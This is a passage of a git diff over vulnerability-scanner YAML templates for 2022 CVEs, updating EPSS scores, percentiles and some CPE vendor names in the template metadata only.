-17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-28955 cwe-id: CWE-287 - epss-score: 0.02376 - epss-percentile: 0.88455 + epss-score: 0.01689 + epss-percentile: 0.86268 cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index b27eb7de21..f9d4dea314 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29004 cwe-id: CWE-79 - epss-score: 0.00174 - epss-percentile: 0.53866 + epss-score: 0.00208 + epss-percentile: 0.58378 cpe: cpe:2.3:a:e-diary_management_system_project:e-diary_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index aef3eaf8aa..3c98115253 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-29005 cwe-id: CWE-79 epss-score: 0.00115 - epss-percentile: 0.44553 + epss-percentile: 0.44941 cpe: cpe:2.3:a:online_birth_certificate_system_project:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 553ff2e73c..d7212b1930 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -19,12 +19,12 @@ info: cve-id: CVE-2022-29006 cwe-id: CWE-89 epss-score: 0.20033 - epss-percentile: 0.95679 - cpe: cpe:2.3:a:directory_management_system_project:directory_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.95748 + cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - vendor: directory_management_system_project + vendor: phpgurukul product: directory_management_system tags: cve,cve2022,sqli,auth-bypass,edb diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index e2d8b54aec..585eda5e2c 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -19,12 +19,12 @@ info: cve-id: CVE-2022-29007 cwe-id: CWE-89 epss-score: 0.20033 - epss-percentile: 0.95679 - cpe: cpe:2.3:a:dairy_farm_shop_management_system_project:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.95748 + cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - vendor: dairy_farm_shop_management_system_project + vendor: phpgurukul product: dairy_farm_shop_management_system tags: cve,cve2022,sqli,auth-bypass,edb diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 7316bc3a16..7f2aac9cc4 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -19,12 +19,12 @@ info: cve-id: CVE-2022-29009 cwe-id: CWE-89 epss-score: 0.20033 - epss-percentile: 0.95679 - cpe: cpe:2.3:a:cyber_cafe_management_system_project:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.95748 + cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - vendor: cyber_cafe_management_system_project + vendor: phpgurukul product: cyber_cafe_management_system tags: cve2022,sqli,auth-bypass,edb,cve diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 93abca2c06..05ebe38bc0 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -17,7 +17,7 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29014 epss-score: 0.79768 - epss-percentile: 0.97868 + epss-percentile: 0.97918 cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index d1bc57b373..5448bd2353 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29078 cwe-id: CWE-94 - epss-score: 0.02789 - epss-percentile: 0.89291 + epss-score: 0.11107 + epss-percentile: 0.94511 cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index b3b04a37c8..9837845f04 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29153 cwe-id: CWE-918 - epss-score: 0.01648 - epss-percentile: 0.85995 + epss-score: 0.0267 + epss-percentile: 0.89213 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 85285b775c..2bdc25142b 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29272 cwe-id: CWE-601 epss-score: 0.00188 - epss-percentile: 0.55474 + epss-percentile: 0.55972 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index e3c1bae639..c80ac49ef6 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29298 cwe-id: CWE-22 - epss-score: 0.13411 - epss-percentile: 0.94862 + epss-score: 0.13839 + epss-percentile: 0.95001 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 85eefe095b..79e045e8a3 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29303 cwe-id: CWE-78 - epss-score: 0.9661 - epss-percentile: 0.99454 + epss-score: 0.95866 + epss-percentile: 0.99251 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index b545f4805f..b288045a3b 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29349 cwe-id: CWE-79 - epss-score: 0.01051 - epss-percentile: 0.82198 + epss-score: 0.012 + epss-percentile: 0.83627 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 6924e709d0..6258f43dc4 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29383 cwe-id: CWE-89 - epss-score: 0.56167 - epss-percentile: 0.97221 + epss-score: 0.48531 + epss-percentile: 0.97092 cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index ff44439f5a..595c2c8e8a 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-29455 cwe-id: CWE-79 epss-score: 0.0018 - epss-percentile: 0.54527 + epss-percentile: 0.54961 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 2afdc9a679..753d5b051b 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29464 cwe-id: CWE-22 - epss-score: 0.97451 - epss-percentile: 0.99922 + epss-score: 0.97471 + epss-percentile: 0.99953 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index abf867a071..e7b7939be8 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29548 cwe-id: CWE-79 - epss-score: 0.00233 - epss-percentile: 0.60683 + epss-score: 0.00239 + epss-percentile: 0.61642 cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 48adfcfad6..2cac1a09c7 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29775 cwe-id: CWE-287 - epss-score: 0.0103 - epss-percentile: 0.82001 + epss-score: 0.01158 + epss-percentile: 0.83287 cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 73dcefd465..a88b211d93 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-30073 cwe-id: CWE-79 - epss-score: 0.00159 - epss-percentile: 0.51862 + epss-score: 0.00226 + epss-percentile: 0.60603 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 196945fe45..5c8e00b5b2 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30489 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40272 + epss-percentile: 0.40575 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index fca46b0abf..83c6a880c0 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30512 cwe-id: CWE-89 epss-score: 0.0148 - epss-percentile: 0.85145 + epss-percentile: 0.85305 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 9d7e17b7bc..30f056f15c 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30513 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43104 + epss-percentile: 0.43476 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 22e4bb2a4d..304ae613eb 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-30514 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43104 + epss-percentile: 0.43476 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 930173625c..79d974384b 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30525 cwe-id: CWE-78 - epss-score: 0.97528 - epss-percentile: 0.99982 + epss-score: 0.9752 + epss-percentile: 0.99984 cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 21bc9d57c3..a6d9bdede2 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3062 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32485 + epss-score: 0.00097 + epss-percentile: 0.40156 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index b5ea8dde24..0908eaa13b 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-30776 cwe-id: CWE-79 epss-score: 0.0011 - epss-percentile: 0.43436 + epss-percentile: 0.4381 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 800841dfa3..b3bd75c84e 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-30777 cwe-id: CWE-79 epss-score: 0.00109 - epss-percentile: 0.43104 + epss-percentile: 0.43476 cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index 189bd39f24..379e45deda 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31126 cwe-id: CWE-74 epss-score: 0.82236 - epss-percentile: 0.9795 + epss-percentile: 0.97998 cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 99aa2a1539..22646b9a97 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31268 cwe-id: CWE-22 - epss-score: 0.00582 - epss-percentile: 0.75319 + epss-score: 0.00701 + epss-percentile: 0.78043 cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index b1871dfe7f..88dbecd2d7 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 - epss-score: 0.00302 - epss-percentile: 0.65738 + epss-score: 0.00174 + epss-percentile: 0.54234 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index b420146157..f4c814357f 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-31299 cwe-id: CWE-79 - epss-score: 0.00167 - epss-percentile: 0.52759 + epss-score: 0.00199 + epss-percentile: 0.57425 cpe: cpe:2.3:a:angtech:haraj:3.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index d1e42fbf5e..80717bb045 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-31373 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40272 + epss-percentile: 0.40575 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index 719d2d59c0..f7df3758b7 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31474 cwe-id: CWE-22 - epss-score: 0.01583 - epss-percentile: 0.85716 + epss-score: 0.01964 + epss-percentile: 0.87396 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 90f732d091..b5de68720f 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31499 cwe-id: CWE-78 - epss-score: 0.17666 - epss-percentile: 0.95449 + epss-score: 0.29402 + epss-percentile: 0.96347 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index aedacf04fa..37eb97b10b 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31656 cwe-id: CWE-287 - epss-score: 0.92696 - epss-percentile: 0.98631 + epss-score: 0.91027 + epss-percentile: 0.98512 cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 891dd7e923..4c184e9e90 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-31798 cwe-id: CWE-384 - epss-score: 0.00148 - epss-percentile: 0.50097 + epss-score: 0.0012 + epss-percentile: 0.459 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index ebcc7805fe..33cd964b0c 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31814 cwe-id: CWE-78 - epss-score: 0.96743 - epss-percentile: 0.99511 + epss-score: 0.96683 + epss-percentile: 0.99515 cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 8ec9ceae2c..207640afab 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31845 cwe-id: CWE-668 - epss-score: 0.00789 - epss-percentile: 0.79334 + epss-score: 0.00887 + epss-percentile: 0.80745 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index 08e72d3d06..d2330cc843 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31846 cwe-id: CWE-668 - epss-score: 0.00789 - epss-percentile: 0.79334 + epss-score: 0.00887 + epss-percentile: 0.80745 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index c916109adf..92464da7b5 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-31847 cwe-id: CWE-425 - epss-score: 0.00794 - epss-percentile: 0.79405 + epss-score: 0.00892 + epss-percentile: 0.80813 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 93cff57e53..21819e455c 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-31854 cwe-id: CWE-434 epss-score: 0.062 - epss-percentile: 0.92636 + epss-percentile: 0.92737 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index 61eb517636..a8cbcbfcb6 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31879 cwe-id: CWE-89 epss-score: 0.0501 - epss-percentile: 0.9185 + epss-percentile: 0.91967 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index cfd7732726..b7f58cce34 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31974 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 53c9d07c13..c97b360929 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31975 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 653f5b5a8d..20be2a8749 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31976 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.82961 + epss-percentile: 0.83164 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 8c24d5e57d..37def02857 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31977 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.82961 + epss-percentile: 0.83164 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index 86c7ce3dcc..fa1998d2d7 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31978 cwe-id: CWE-89 epss-score: 0.01144 - epss-percentile: 0.82961 + epss-percentile: 0.83164 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index c3027d5dcd..3fe1380e66 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31980 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 174daa5ef6..9aed05fadc 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31981 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 9427a0d5d3..5d046f9ea5 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31982 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index e4e1202502..374ddd58a1 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31983 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 4f1b8b2d9e..575a2ba069 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-31984 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index ee862428ec..c25ac3ce46 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32007 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 6fda44fe6e..2d73aae37e 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32015 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: 